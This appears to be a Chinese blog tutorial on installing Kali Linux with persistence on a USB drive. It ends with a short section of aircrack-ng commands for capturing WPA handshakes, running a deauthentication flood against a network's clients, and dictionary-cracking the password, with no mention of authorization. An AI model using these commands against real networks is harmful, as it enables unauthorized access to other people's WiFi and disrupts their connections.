因為:
- Kali Linux 自帶aircrack-ng
- 虛擬機VMware不能用筆記本內置網卡,需要另外買一個無線網卡,然而並不想買
- 不想給筆記本重裝Kali Linux系統
- 有閑置的32GU盤
所以:
- 將Kali Linux系統裝進U盤來用!!!
- 想用kali系統就插U盤!!!!!!!
- 很方便!!!!!!!!!!!!!
- 打開了新世界大門!!!!!!!!
一、准備好需要下載的東西
知道你們懶(我也是),這里放了各種有用的沒用的軟件。
鏈接:https://pan.baidu.com/s/1ZAW_qyW1v3SCuoVBw5Ck5A
提取碼:y1kf
二、制作U盤啟動盤
先格式化U盤,安裝打開Universal USB Installer(網盤里的UUI)。
由於當時沒有截圖,我就文字說明下,看不懂的去網上搜教程。
- step1:下拉選擇kali linux
- step2:選擇kali鏡像文件的位置
- step3:選擇你的U盤,勾選“we wlii fomat”選項
- 點擊create
- 看到綠色屏幕shuashuashua
- 點擊close
三、電腦設置從U盤啟動
我是華碩筆記本,重啟,按按按按按按delete鍵,進入BIOS面板(還是沒有截圖)
- 在boot中找到“Boot Option #1”
- 回車,選擇“你的U盤”
- 按F10保存退出
- U盤插着,重啟電腦就可以從U盤啟動了
四、進入Kali
看到Live、failsafe、forensic mode、Persistence、Encrypted Persistence、Install、Graphical Install等等幾個選項。
大概講一下(沒寫就是不知道):
- Live:不會保留你在Kali系統所做的任何變動(比如下載軟件或文件),重啟就會初始化。
- failsafe:檢查系統出錯。
- Persistence:持久化,保留你在Kali系統做的變動。需要另外設置U盤分區存放改變的文件。
- Encrypted Persistence:加密的Persistence。
- Install:安裝無圖形界面的系統,就是只有命令行。
- Graphical Install:安裝圖形界面的系統。
一般選擇Live或者Persistence。
Live直接回車進入就可以用了,而Persistence需要另外設置,接下來寫下如何讓Kali持久化。
五、Kali持久化
1、下載MiniTool Partition Wizard Free Edition(網盤里的pw11-free.exe)
- 安裝打開
- 選擇你的U盤,右鍵->create
- Partition Label:persistence,Create As:Primary,File System:ext4
- Unallocated Space Before:0.00
- Partition Size(分配分區的大小):將U盤額外的空間全部分配(Kali大概分配了4G,剩下24G左右吧)
- 點擊ok
- 點擊左上角的Apply
2、進入kali系統(U盤插着)
- 打開終端
- 輸入fdisk -l 看清楚是哪個Device(我根據24GSize找到/dev/sdc2)
- 輸入mkdir -p /mnt/persist 創建一個名為“persist”的掛載目錄
- 輸入mount /dev/sdc2 /mnt/persist 掛載設備,這里的sdc2以自己電腦為准
- 輸入echo "/ union" >> /mnt/persist/persistence.conf 創建一個persistence.conf的文件,並寫入“/ union”
- 輸入cat /mnt/persist/persistence.conf 顯示 / union 即為成功
- 輸入umount /dev/sdc2 掛載完成需要卸載設備
- 輸入shutdown -h now 關機
- 重啟 選擇Persistence進入系統,會保留系統變動。
六、使用aircrack-ng
這部分純粹是筆記,因為還是沒有截圖,所以理解起來比較難,建議查看其他教程。(網盤里面有密碼字典)
ifconfig //找到無線網卡wlan0 airmon-ng start wlan0 //啟動無線網卡的監聽模式 ifconfig //出現wlan0mon即開啟成功 airodump-ng wlan0mon //掃描周圍WiFi信息
//抓取握手包,並存放在“存放握手包目錄”。成功的話會在時間后面顯示 WPA handshake,Ctrl-C可停止 airodump-ng -c 頻道號 --bssid MAC地址 -w 存放握手包的目錄 wlan0mon
//另開終端,輸入這條命令,洪水攻擊提高抓取握手包效率,Ctrl-C可停止 aireplay-ng -0 0 -a MAC地址 wlan0mon
//關閉監聽模式 airmon-ng stop wlan0mon
//例如:aircrack-ng -a2 -b X:X:X:X:X:X -w /usr/share/worldlist/rockyou.txt ~/*.cap aircrack-ng -a2 -b MAC地址 -w 存放密碼字典的路徑 握手包路徑*.cap
說明:
- BSSID: MAC地址(重要)
- CH: 頻道號 (重要)
- #Data: 有數字說明有人在連WiFi,選擇不為0的
- PWR: 信號強度,越往上越強
- ESSID: WiFi名稱